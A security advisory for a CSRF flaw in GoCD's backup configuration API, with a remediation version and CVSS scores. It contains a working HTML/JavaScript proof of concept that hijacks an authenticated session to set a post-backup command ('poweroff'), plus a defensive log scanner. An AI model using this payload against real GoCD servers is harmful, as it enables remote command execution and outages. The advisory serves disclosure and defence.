

Date: April 1, 2021


GoCD versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery (CSRF) because the `/go/api/config/backup` endpoint lacks CSRF protection. An attacker can trick a victim into clicking a malicious link, which could change the backup configuration or execute system commands through the `post_backup_script` field.


The `GoCD` module can be abused through Cross-Site Request Forgery because the `/go/api/config/backup` endpoint lacks CSRF protection. By enticing a user to click through to an attacker-controlled website, an attacker can make the victim change the backup configuration settings, for example executing system commands through the `post_backup_script` field or changing the backup schedule.

PoC Details

Create a file with the content below. When an authenticated user clicks on a malicious link sent by the attacker, a CSRF request is sent to the legitimate server and the backup configuration is changed.

PoC Code

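    <html>
    <script>
    // CSRF PoC: runs in the victim's browser and reuses their GoCD session.
    function backup() {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.withCredentials = true;  // send the victim's cookies with the request
        xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
        xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
        // Backup configuration submitted as the request body.
        xmlhttp.send(JSON.stringify({
            "schedule": null,
            "post_backup_script": "poweroff",
            "email_on_success": false,
            "email_on_failure": false
        }));
    }
    backup();
    </script>
    </html>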
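For defenders, the request described above can be looked for in proxy or access logs. The following is an added example, not part of the original advisory or of GoCD: it flags state-changing requests to the backup endpoint whose `Origin` or `Referer` is not a trusted GoCD origin. The record fields, the host names and the assumption that the proxy logs `Origin` and `Referer` are hypothetical.

```python
from urllib.parse import urlsplit

ENDPOINT = "/go/api/config/backup"            # endpoint named in the advisory
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

def origin_of(value):
    """Normalise an Origin or Referer value to scheme://host[:port], or None."""
    parts = urlsplit(value or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def csrf_finding(req, trusted_origins):
    """Return a reason string if req looks like a cross-site write, else None."""
    if req["method"].upper() not in WRITE_METHODS:
        return None
    if urlsplit(req["path"]).path.rstrip("/") != ENDPOINT:
        return None
    origin, referer = req.get("origin"), req.get("referer")
    if origin == "null":
        # Opaque origin: page opened from a local file or a sandboxed frame.
        return "opaque origin (null)"
    source = origin_of(origin) or origin_of(referer)
    if source is None:
        # No browser provenance headers: typical of curl or API scripts.
        return None
    if source not in trusted_origins:
        return f"cross-origin write from {source}"
    return None

def scan(requests, trusted_origins):
    """Return (request, reason) pairs for every flagged record."""
    trusted = {o.lower() for o in trusted_origins}
    return [(r, why) for r in requests if (why := csrf_finding(r, trusted))]

# Constructed sample records with hypothetical hosts, not taken from real logs.
SAMPLE = [
    {"method": "POST", "path": ENDPOINT, "origin": "https://gocd.example.internal"},
    {"method": "POST", "path": ENDPOINT, "origin": "https://attacker.example"},
    {"method": "POST", "path": ENDPOINT, "origin": "null"},
    {"method": "GET", "path": ENDPOINT, "referer": "https://attacker.example/x.html"},
    {"method": "POST", "path": ENDPOINT + "/", "referer": "https://attacker.example/x.html"},
    {"method": "POST", "path": ENDPOINT},  # API client without browser headers
]

if __name__ == "__main__":
    for rec, why in scan(SAMPLE, ["https://gocd.example.internal"]):
        print(why, rec)
```

Requests without either header are not flagged here, so this check complements rather than replaces reviewing the stored `post_backup_script` value after upgrading.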


Affected Environments



Upgrade to 21.2.0

Language: Java

Good to know:


Cross-Site Request Forgery (CSRF)


Upgrade Version

Upgrade to version 21.2.0


CVSS v3 Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
CVSS v2 Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Complete
Integrity (I): Complete
Availability (A): Complete